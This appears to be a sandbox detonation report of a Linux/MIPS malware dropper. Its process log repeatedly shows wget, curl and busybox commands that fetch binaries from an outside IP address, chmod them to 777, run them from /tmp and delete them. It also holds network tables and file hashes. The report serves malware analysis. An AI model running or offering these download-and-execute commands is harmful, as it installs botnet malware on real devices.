[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
debian9-mipsel-20240611-en
Max time kernel
67s
Max time network
69s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
